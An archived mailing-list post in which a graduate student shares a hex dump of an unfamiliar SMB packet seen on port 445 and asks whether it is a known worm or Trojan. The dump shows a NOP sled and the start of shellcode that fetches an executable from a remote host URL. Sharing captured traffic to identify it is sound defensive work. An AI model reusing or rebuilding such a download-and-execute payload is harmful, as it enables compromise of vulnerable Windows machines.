Message-ID: <Pine.GSO.4.58.0408311434040.2605@gradlab.ucsd.edu>
From: susingh at cs.ucsd.edu (Sumeet SINGH)
Subject: Is this a new Trojan?

hi,

We've been seeing a large number of copies of a TCP packet to port 445 that
includes the following portion, which we have not seen before:

00 00 0c f4 ff 53 4d 42 25 00 00 00 00 18 07 c8  .....SMB%.......
00 00 00 00 00 00 00 00 00 00 00 00 00 08 dc 04  ................
00 08 60 00 10 00 00 a0 0c 00 00 00 04 00 00 00  ..`.............
00 00 00 00 00 00 00 00 00 54 00 a0 0c 54 00 02  .........T...T..
00 26 00 00 40 b1 0c 10 5c 00 50 00 49 00 50 00  .&..@...\.P.I.P.
45 00 5c 00 00 00 00 00 05 00 00 03 10 00 00 00  E.\.............
a0 0c 00 00 01 00 00 00 88 0c 00 00 00 00 09 00  ................
ec 03 00 00 00 00 00 00 ec 03 00 00 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 eb 58 68 74  .............Xht
74 70 3a 2f 2f 32 30 32 2e 31 2e 32 30 30 2e 31  tp://202.1.200.1
39 3a 32 34 34 36 2f 78 2e 65 78 65 df df df df  9:2446/x.exe....
df df df df df df df df df 4d 6f 7a 69 6c 6c 61  .........Mozilla
2f 34 2e 30 df 5d 33 c9 66 b9 ee 01 8d 75 05 8b  /4.0.]3.f....u..
fe 8a 06 3c 99 75 05 46 8a 06 2c 30 46 34 99 88  .....u.F..,0F4..

(the remainder of the packet has been removed)

Has anyone seen this before?
The IP address (202.1.200.19) is unreachable.

Is this an old exploit (worm/bot) that just took its time to come around
to us?

-- sumeet
PhD student
UCSD

